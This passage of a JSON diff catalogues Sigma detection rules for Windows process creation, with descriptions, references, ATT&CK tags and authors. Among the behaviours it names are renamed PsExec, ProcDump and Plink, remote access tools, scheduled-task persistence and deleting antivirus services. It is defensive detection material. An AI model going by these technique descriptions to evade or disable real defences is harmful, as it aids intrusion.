+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/misbehaving-rats/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/09/19",
+ "filename": "proc_creation_win_renamed_netsupport_rat.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of renamed paexec via imphash and executable product string",
+ "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b",
+ "value": "Execution of Renamed PaExec",
+ "meta": {
+ "refs": [
+ "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003",
+ "attack.g0046",
+ "car.2013-05-009",
+ "attack.execution",
+ "attack.t1569.002"
+ ],
+ "creation_date": "2019/04/17",
+ "filename": "proc_creation_win_renamed_paexec.yml",
+ "author": "Jason Lynch",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown imphashes"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Execution of a renamed version of the Plink binary",
+ "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43",
+ "value": "Execution Of Renamed Plink Binary",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
+ "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036"
+ ],
+ "creation_date": "2022/06/06",
+ "filename": "proc_creation_win_renamed_plink.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of a renamed PowerShell often used by attackers or malware",
+ "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20",
+ "value": "Renamed PowerShell",
+ "meta": {
+ "refs": [
+ "https://twitter.com/christophetd/status/1164506034720952320",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml"
+ ],
+ "tags": [
+ "car.2013-05-009",
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2019/08/22",
+ "filename": "proc_creation_win_renamed_powershell.yml",
+ "author": "Florian Roth, frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware",
+ "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67",
+ "value": "Renamed ProcDump",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2019/11/18",
+ "filename": "proc_creation_win_renamed_procdump.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Procdump illegaly bundled with legitimate software",
+ "Weird admins who renamed binaries (and should be investigated)"
+ ],
+ "logsource.category": 
"process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of a renamed PsExec often used by attackers or malware",
+ "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2",
+ "value": "Renamed PsExec",
+ "meta": {
+ "refs": [
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml"
+ ],
+ "tags": [
+ "car.2013-05-009",
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2019/05/21",
+ "filename": "proc_creation_win_renamed_psexec.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Software that illegaly integrates PsExec in a renamed form",
+ "Administrators that have renamed PsExec and no one knows why"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection",
+ "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2",
+ "value": "Renamed Rundll32.exe Execution",
+ "meta": {
+ "refs": [
+ "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml"
+ ],
+ "tags": "No established tags",
+ "creation_date": "2022/06/08",
+ "filename": "proc_creation_win_renamed_rundll32.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection",
+ "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed",
+ "value": "DllRegisterServer Call From Non Rundll32",
+ "meta": {
+ "refs": [
+ "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ],
+ "creation_date": "2022/08/22",
+ "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field",
+ "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5",
+ "value": "Execution of Renamed Remote Utilities RAT (RURAT)",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/misbehaving-rats/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.collection",
+ "attack.command_and_control",
+ "attack.discovery",
+ "attack.s0592"
+ ],
+ "creation_date": "2022/09/19",
+ "filename": "proc_creation_win_renamed_rurat.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)",
+ "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90",
+ "value": "Renamed Sysinternals Sdelete Usage",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ],
+ "creation_date": "2022/09/06",
+ "filename": "proc_creation_win_renamed_sdelete.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "System administrator usage"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading",
+ "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205",
+ "value": "Renamed or Portable Vmnat.exe",
+ "meta": {
+ "refs": [
+ "https://twitter.com/malmoeb/status/1525901219247845376",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002"
+ ],
+ "creation_date": "2022/09/09",
+ "filename": "proc_creation_win_renamed_vmnat.yml",
+ "author": "elhoim",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection",
+ "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0",
+ "value": "Renamed Whoami Execution",
+ "meta": {
+ "refs": [
+ "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
+ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "car.2016-03-001"
+ ],
+ "creation_date": "2021/08/12",
+ "filename": "proc_creation_win_renamed_whoami.yml",
+ 
"author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", + "value": "Root Certificate Installed", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2020/10/10", + "filename": "proc_creation_win_root_certificate_installed.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "medium", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "value": "Remote Procedure Call Service Anomaly", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", + "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/04/13", + "filename": "proc_creation_win_rpcss_anomalies.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown", + "Some cases in which the service spawned a werfault.exe process" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", + "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "value": "Rundll32 With Suspicious Parent Process", + "meta": { + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/05/21", + "filename": "proc_creation_win_rundll32_parent_explorer.yml", + "author": "CD_ROM_", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "load malicious registered COM objects", + "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "value": "Rundll32 Registered COM Objects", + "meta": { + "refs": [ + "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_rundll32_registered_com_objects.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "value": "Rundll32 UNC Path Execution", + "meta": { + "refs": [ + "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" + ], + "creation_date": "2022/08/10", + "filename": "proc_creation_win_rundll32_unc_path.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "uuid": "5bb68627-3198-40ca-b458-49f973db8752", + "value": "Rundll32 Without Parameters", + "meta": { + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2021/01/31", + "filename": "proc_creation_win_rundll32_without_parameters.yml", + "author": "Bartlomiej Czyz, Relativity", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "value": "Rundll32 Execution Without DLL File", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1481630810495139841?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/13", + "filename": "proc_creation_win_run_executable_invalid_extension.yml", + "author": "Tim Shelton, Florian Roth, Yassine Oukessou 
(fix + fp)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", + "uuid": "1a70042a-6622-4a2b-8958-267625349abf", + "value": "Run from a Zip File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_run_from_zip.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "value": "Run PowerShell Script from ADS", + "meta": { + "refs": [ + "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2019/10/30", + "filename": "proc_creation_win_run_powershell_script_from_ads.yml", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell script execution via input stream redirect", + "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "value": "Run PowerShell Script from Redirected Input Stream", + "meta": { + 
"refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "uuid": "bab049ca-7471-4828-9024-38279a4c04da", + "value": "Detect Virtualbox Driver Installation OR Starting Of VMs", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1564/006/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" + ], + "creation_date": "2020/09/26", + "filename": "proc_creation_win_run_virtualbox.yml", + "author": "Janantha Marasinghe", + "level": "low", + "falsepositive": [ + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a schtask that 
executes a file from C:\\Users\\\\AppData\\Local", + "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "value": "Suspicious Schtasks Execution AppData Folder", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2022/03/15", + "filename": "proc_creation_win_schtasks_appdata_local_system.yml", + "author": "pH-T, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "uuid": "970823b7-273b-460a-8afc-3a6811998529", + "value": "Uncommon Scheduled Task Once 00:00", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" + ], + "tags": "No established tags", + "creation_date": "2022/07/15", + "filename": "proc_creation_win_schtasks_once_0000.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Software installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", + "uuid": "b66474aa-bd92-4333-a16c-298155b120df", + "value": "Suspicious Powershell No File or Command", + "meta": { + "refs": [ + 
"https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2022/04/08", + "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", + "author": "pH-T, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "value": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2022/02/12", + "filename": "proc_creation_win_schtasks_reg_loader.yml", + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "value": "Schtasks Creation Or Modification With SYSTEM Privileges", + "meta": { + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/07/28", + "filename": "proc_creation_win_schtasks_system.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", + "value": "Use of ScreenConnect Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_screenconnect.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the tool" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "value": "ScreenConnect Backstage Mode Anomaly", + "meta": { + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/25", + "filename": "proc_creation_win_screenconnect_anomaly.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + 
"value": "Script Event Consumer Spawning Process", + "meta": { + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2021/06/21", + "filename": "proc_creation_win_script_event_consumer_spawn.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", + "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", + "value": "Suspicious Execution of Sc to Delete AV Services", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_sc_delete_av_services.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", + "value": "SC.EXE Query Execution", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007" + ], + "creation_date": "2021/12/06", + "filename": "proc_creation_win_sc_query.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate query of a service by an administrator to get more information such as the state or PID" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", + "value": "Possible Shim Database Persistence via sdbinst.exe", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_sdbinst_shim_persistence.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", + "value": "Sdclt Child Processes", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/05/02", + "filename": "proc_creation_win_sdclt_child_process.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SDelete to erase a file not the free space", + "uuid": "a4824fca-976f-4964-b334-0621379e84c4", + "value": "Sysinternals SDelete Delete File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/06/03", + "filename": "proc_creation_win_sdelete.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "System administrator usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects sdiagnhost.exe calling a 